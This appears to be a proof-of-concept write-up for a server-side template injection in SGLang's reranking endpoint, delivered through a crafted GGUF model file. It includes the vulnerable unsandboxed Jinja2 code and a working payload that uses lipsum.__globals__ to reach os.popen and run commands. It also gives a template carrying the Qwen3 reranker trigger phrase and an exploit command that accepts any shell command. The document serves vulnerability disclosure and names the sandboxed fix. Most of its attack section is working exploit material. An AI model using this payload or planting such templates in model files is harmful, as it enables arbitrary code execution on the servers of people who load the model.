Remote Code Execution via Server-Side Template Injection (SSTI) in SGLang's reranking endpoint. A malicious GGUF model file with a crafted tokenizer.chat_template achieves arbitrary code execution when loaded into SGLang and the /v1/rerank endpoint is called.
This PoC exploits a critical-severity vulnerability in SGLang caused by unsandboxed Jinja2 template rendering. SGLang's reranking endpoint (`/v1/rerank`) renders model-supplied chat templates using `jinja2.Environment()` instead of `ImmutableSandboxedEnvironment`, allowing a malicious model to execute arbitrary Python code on the inference server.
This is the same vulnerability class as CVE-2024-34359 ("Llama Drama") which affected llama-cpp-python.
- Attacker crafts a GGUF model file with a malicious `tokenizer.chat_template` containing a Jinja2 SSTI payload
- The template includes the Qwen3 reranker trigger phrase to activate the vulnerable code path in `serving_rerank.py`
- Victim downloads and loads the model in SGLang (e.g., from HuggingFace)
- When any request hits `/v1/rerank`, SGLang reads the `chat_template` and renders it with `jinja2.Environment()`, with no sandbox
- The SSTI payload executes arbitrary Python code on the server
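The SSTI primitive behind the last two steps can be demonstrated with plain Jinja2, outside SGLang entirely. This is a minimal sketch, not SGLang code: an unsandboxed `jinja2.Environment` exposes default globals such as `lipsum`, whose `__globals__` dictionary reaches the `os` module of the module that defines it.

```python
import jinja2

# Attacker-controlled template string, as it would arrive via
# tokenizer.chat_template in a malicious model file.
payload = '{{ lipsum.__globals__["os"].popen("echo pwned").read() }}'

# Unsandboxed environment, mirroring the vulnerable construction.
env = jinja2.Environment(loader=jinja2.BaseLoader())
result = env.from_string(payload).render()
print(result)  # output of the injected OS command
```

With `ImmutableSandboxedEnvironment` the same render raises `jinja2.exceptions.SecurityError` instead of executing the command.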
File: `python/sglang/srt/entrypoints/openai/serving_rerank.py`

```python
# serving_rerank.py lines 128-132 — UNSANDBOXED
def _get_jinja_env():
    return jinja2.Environment(  # <-- should be ImmutableSandboxedEnvironment
        loader=jinja2.BaseLoader(),
        autoescape=False,
        undefined=jinja2.Undefined,
    )
```

The PoC generates a malicious GGUF file and demonstrates code execution through SGLang's unsandboxed rendering path.
```shell
python3 exploit.py "id"
```

Pass any shell command as the argument; it defaults to `id`.
The malicious chat template embedded in the GGUF file:
```python
MALICIOUS_TEMPLATE = (
    'The answer can only be "yes" or "no".\n'
    '{{ lipsum.__globals__["os"].popen("echo SGLANG_RCE_CONFIRMED").read() }}'
    '{% for message in messages %}{{ message["content"] }}{% endfor %}'
)
```

- The trigger phrase (`The answer can only be "yes" or "no"`) is required to activate SGLang's Qwen3 reranker detection, routing the request through the vulnerable `_render_jinja_chat_template()` path.
- `lipsum.__globals__["os"].popen()` escapes the Jinja2 rendering context to execute arbitrary OS commands.
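The full template can be exercised with plain Jinja2 to see why the injection is easy to miss: the command output is interleaved with normal-looking reranker prompt text. A sketch, assuming a typical `messages` context (this does not reproduce SGLang's trigger-phrase routing, only the render itself):

```python
import jinja2

MALICIOUS_TEMPLATE = (
    'The answer can only be "yes" or "no".\n'
    '{{ lipsum.__globals__["os"].popen("echo SGLANG_RCE_CONFIRMED").read() }}'
    '{% for message in messages %}{{ message["content"] }}{% endfor %}'
)

out = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(
    MALICIOUS_TEMPLATE
).render(messages=[{"role": "user", "content": "query: hello"}])
print(out)  # injected command output followed by the legitimate prompt
```

Both the `SGLANG_RCE_CONFIRMED` marker and the message contents appear in the rendered string, so the template still behaves like a working chat template for the victim.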
- CVE-2026-5760
- CVE-2024-34359 — Same vulnerability class in llama-cpp-python
- CVE-2025-61620 — DoS in vLLM via chat templates (same attack surface)
- SGLang GitHub
- CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine
- CWE-94: Improper Control of Generation of Code
This tool is for authorized security research and educational purposes only. Use responsibly.